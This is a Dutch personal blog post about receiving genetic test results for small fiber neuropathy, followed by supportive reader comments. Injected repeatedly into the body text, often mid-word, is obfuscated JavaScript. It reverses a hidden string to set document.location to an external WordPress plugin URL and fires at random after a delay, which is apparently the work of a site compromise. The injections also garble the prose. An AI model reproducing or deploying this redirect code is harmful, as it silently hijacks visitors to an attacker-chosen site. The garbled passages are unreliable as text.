Persoonlijk Update gezondheid en behandeling

De uitslag van het genetisch onderzoek dunne vezelneuropathie

Vorige maand kreeg ik de diagnose dunne vezel neuropathie. Geen fijne diagnose om te krijgen. Naast de onderzoeken die waren gedaan om te kijken of ik het wel of niet zou hebben is er ook genetisch onderzoek gedaan. Om te kijken of dit de oorzaak zou kunnen zijn. Vandaag kreeg ik de uitslag van het genetisch onderzoek.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top-dreaming-300×300.jpg” alt=”Don’t stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top dreaming” width=”358″ height=”358″ />

De uitslag van het genetisch onderzoek

Ik kreeg gisteren het allerbeste nieuws ever! Van de 10 genen die onderzocht zijn, zijn er geen afwijkingen gevonden! De dunne vezel neuropathie heeft bij mij dus geen genetische oorzaak en dit houd in dat ik, mocht ik ooit moeder worden, niet een 50% risico loop dit door te geven aan mijn kindje. Hier ben ik echt zo ontzettend ongelooflijk blij mee!

De ziekte van Lyme kan ontzettend veel kapot maken in het lichaam. Eigenlijk alles. Zo kan Lyme ook zorgen voor dunne vezel neuropathie.  Het lijkt er dus op alsof dit bij mij de oorzaak is. Voor de prognose maakt het weinig verschil.  Het beloop van dunne vezel neuropathie is niet te voorspellen. De klachten kunnen verergeren, stabiel blijven en bij een klein percentage verminderen de klachten. Ook kan het een grillig verloop hebben met goede perioden en periode waarin het minder gaat. Iets wat ook zo is met chronische Lyme, bartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonella en chronische pfeiffer.

Grillig, onzeker, onvoorspelbaar en onbekend is voor mij dus iets waar ik toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch al mee moet dealen. Dat er nu een extra diagnose is voor de klachten die ik toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch al heb, dat maakt voor mij feitelijk niet heel veel verschil. Lyme is nou eenmaal een fucker, met dat gegeven ben ik inmiddels wel bekend!

Have faith in your dreams - quote en tekening

Wat wel veel verschil had uitgemaakt is als dit ervoor gezorgd had dat mijn droom om ooit moeder te worden had verpest… Maar gelukkig is dat niet het geval.

De komende tijd dus nog maar een beetje fitter worden, mr. Perfect aan de haak slaan en I’m good toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to go! 😀😋

 

 

Facebook reacties

17 Reacties

 • Reply
  Nadine Lemstra
  16 juni 2017 at 08:52

  Dubbel dus. Slecht en super nieuws. Hoop voor jou dat je droom om moeder te worden snel uitkomt je verdient het

  • Reply
   Marleen Groeneveld
   16 juni 2017 at 09:16

   Het slechte nieuws dat wist ik al. Het kon alleen nog slechter worden en dat is dus niet zo! Gelukkig! Had me er wel op voorbereid, dus dit is zo’n enorme meevaller. Echt HAPPY!!! 😀

 • Reply
  Inge van Ulden
  16 juni 2017 at 09:08

  nou wat fijn!!!

 • Reply
  Klaske De Vries
  16 juni 2017 at 09:59

  Zo fijn dit!!!❤️ En nu tijd voor een lekkere leuke lieve vent

  • Reply
   Marleen Groeneveld
   16 juni 2017 at 11:25

   Hahaha, ja zeker waar! Al heb ik er geen haast mee hoor.. 😉 Het is gewoon fijn dat dingen in elk geval niet onmogelijk zijn en er dus ruimte is om te dromen! <3

 • Reply
  Greet Groeneveld
  16 juni 2017 at 10:38

 • Reply
  Hein Karman
  16 juni 2017 at 12:58

  Jeej Marleen, wat een mooi bericht. Ben super blij voor je. Hoop dat je gestaag nog verder opknapt. Je hebt nu in ieder geval reden voor een feestje.

  Heel veel liefs Hein

  • Reply
   Marleen
   16 juni 2017 at 13:28

   Dank je wel Hein! Heel erg lief berichtje. Veel liefs en een knuffel

 • Reply
  Kimm Bootsman
  16 juni 2017 at 11:03

  Wat een mooi nieuws.. Op naar de prins!!

 • Reply
  Bouwe van Rijn Sr.
  16 juni 2017 at 18:05

  Dat is goed nieuws Marleen Groeneveld gelukkig geen gen afwijking, bij mij helaas verleden jaar wel een gen afwijking gevonden. Maar het slechte nieuws is dat er voorlopig geen medicijnen zijn die dvn kan genezen enkel pijnbestrijding.

  • Reply
   Marleen Groeneveld
   16 juni 2017 at 18:18

   Zeker goed nieuws Bouwe, al blijft het natuurlijk inderdaad een klote diagnose. Heb jij baat bij pijnbestrijding? Er is weinig mogelijk he? Sterkte!

 • Reply
  Susan van der Meij
  16 juni 2017 at 18:07

  Super fijn voor je!!! Kun je tóch je kinderwens in vervulling laten gaan!

 • Reply
  MC Kleuver
  17 juni 2017 at 13:05

  Ik geloof dat jij Mr. Perfect wel vindt hoor! Ben heel blij voor je dat je je kinderwens niet hoeft op te geven!

  • Reply
   Marleen
   17 juni 2017 at 17:18

   Wat lief van je, dank je wel!!

  Leave a Reply

  Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.

  %d bloggers liken dit: